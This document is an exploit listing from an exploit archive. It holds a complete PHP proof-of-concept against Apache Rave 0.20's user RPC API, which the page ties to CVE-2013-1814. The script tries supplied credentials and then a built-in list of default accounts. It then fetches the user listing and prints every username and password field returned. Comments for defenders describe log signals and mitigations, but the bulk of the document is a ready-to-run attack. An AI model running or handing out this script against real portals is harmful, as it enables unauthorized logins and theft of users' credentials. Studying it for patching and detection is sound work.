## https://sploitus.com/exploit?id=PACKETSTORM:189627
=============================================================================================================================================
| # Title : Apache Rave 0.20 Disclosure of user information vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://archive.apache.org/dist/rave/binaries/apache-rave-0.20-bin.tar.gz.sha |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
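[+] Code Description: Extracts user data from Apache Rave by exploiting a vulnerability in the RPC API. The script must authenticate first, so the exposure is to any logged-in account, including default accounts that were never changed.
(Related: https://packetstorm.news/files/id/180605/ - linked CVE number: CVE-2013-1814.)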
[+] save code as poc.php.
[+] Set target : line 90
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the Apache Rave user-information disclosure
 * (the page links it to CVE-2013-1814).
 *
 * Flow as written: authenticate to the portal, call the user RPC endpoint with
 * the resulting session, and print the "username" and "password" fields of
 * every record returned.
 *
 * Reviewer notes for defenders:
 *  - The weakness shown here is server-side: the users/get response carries a
 *    "password" field to whichever authenticated session asks for it. The fix
 *    belongs in the API (do not serialize credential fields, restrict the
 *    endpoint to administrators), not in the client.
 *  - NOTE(review): whether the returned value is a hash or plaintext cannot be
 *    determined from this script - confirm against the vendor advisory.
 *  - Useful log signals: several POSTs to /portal/j_spring_security_check from
 *    one source cycling through the account names in $default_accounts,
 *    followed by a GET to /portal/app/api/rpc/users/get from a non-admin session.
 *  - Mitigation: remove or re-credential the accounts listed in
 *    $default_accounts and apply the vendor fix referenced by the CVE.
 */
class ApacheRaveExploit {
// Host name or IP address placed into the request URLs.
private $target;
// TCP port placed into the request URLs (constructor default: 8080).
private $port;
// Credentials tried first by run().
private $username;
private $password;
// Username => password pairs tried by run() when the supplied credentials fail.
// Every entry uses the account name as its own password. On a deployment these
// are the accounts to audit: delete them or give them unique credentials.
private $default_accounts = [
"canonical" => "canonical",
"john.doe" => "john.doe",
"jane.doe" => "jane.doe",
"johnldap" => "johnldap",
"four.col" => "four.col"
];
/**
 * Stores the connection settings; performs no network activity.
 *
 * @param string $target   Host name or IP address of the portal.
 * @param int    $port     Portal port, 8080 by default.
 * @param string $username Account tried first by run().
 * @param string $password Password for that account.
 */
public function __construct($target, $port = 8080, $username = "", $password = "") {
$this->target = $target;
$this->port = $port;
$this->username = $username;
$this->password = $password;
}
/**
 * Issues one HTTP request through cURL and returns what curl_exec() returns.
 *
 * @param string $url    Absolute URL to request.
 * @param string $method HTTP verb, set through CURLOPT_CUSTOMREQUEST.
 * @param array  $data   Form fields; used only when $method is "POST".
 * @param string $cookie Session id, sent as a JSESSIONID cookie when non-empty.
 * @return string|false  Transfer result, or false when the transfer fails.
 */
private function sendRequest($url, $method = "GET", $data = [], $cookie = "") {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
// Return the transfer as a string instead of writing it to output.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($method === "POST") {
// Fields are URL-encoded into a standard form body.
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
}
if ($cookie) {
curl_setopt($ch, CURLOPT_COOKIE, "JSESSIONID=$cookie");
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
/**
 * Posts a username/password pair to the portal's form-login endpoint.
 *
 * The URL is built with the http:// scheme, so the credentials travel in
 * clear text as written. Each call is one login attempt; failed attempts
 * against this path are what account-lockout and rate-limit controls count.
 *
 * @param string $username Value sent as j_username.
 * @param string $password Value sent as j_password.
 * @return string|null     The text captured after "JSESSIONID=" in the
 *                         returned data, or null when the pattern is absent.
 */
public function login($username, $password) {
$url = "http://{$this->target}:{$this->port}/portal/j_spring_security_check";
$response = $this->sendRequest($url, "POST", [
"j_username" => $username,
"j_password" => $password
]);
// Capture everything after "JSESSIONID=" up to the next semicolon.
preg_match('/JSESSIONID=([^;]+)/', $response, $matches);
return $matches[1] ?? null;
}
/**
 * Requests the user listing from the RPC API using an existing session.
 *
 * This is the request that exposes the data: the endpoint is called with an
 * ordinary session cookie and offset=0, and the reply is decoded as JSON.
 *
 * @param string $cookie JSESSIONID value of an authenticated session.
 * @return mixed         Decoded JSON as an associative array, or null when
 *                       the response is not valid JSON.
 */
public function discloseUsers($cookie) {
$url = "http://{$this->target}:{$this->port}/portal/app/api/rpc/users/get?offset=0";
$response = $this->sendRequest($url, "GET", [], $cookie);
return json_decode($response, true);
}
/**
 * Drives the whole sequence and prints progress and results to stdout.
 *
 * Order of operations: log in with the constructor credentials; on failure,
 * walk $default_accounts until one login yields a session id; then fetch the
 * user listing and print one line per record. Returns nothing.
 */
public function run() {
echo "[*] Trying to authenticate...\n";
$cookie = $this->login($this->username, $this->password);
if (!$cookie) {
echo "[-] Failed with provided credentials, trying default accounts...\n";
// Stop at the first default account that produces a session id.
foreach ($this->default_accounts as $user => $pass) {
echo "[*] Trying $user...\n";
$cookie = $this->login($user, $pass);
if ($cookie) {
echo "[+] Logged in with $user!\n";
break;
}
}
}
if (!$cookie) {
echo "[-] Login failed!\n";
return;
}
echo "[*] Fetching user data...\n";
$users = $this->discloseUsers($cookie);
// The script expects the records under result.resultSet in the decoded reply.
if ($users && isset($users["result"]["resultSet"])) {
foreach ($users["result"]["resultSet"] as $user) {
// The "password" field printed here is the disclosed value.
echo "[+] Found user: " . $user["username"] . " - " . $user["password"] . "\n";
}
} else {
echo "[-] No users found!\n";
}
}
}
// Published placeholder values ("target-ip", "admin"/"password"); the constructor
// only stores them, so nothing is contacted until run() is called.
$exploit = new ApacheRaveExploit("target-ip", 8080, "admin", "password");
// run() prints its progress and any returned records to stdout.
$exploit->run();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================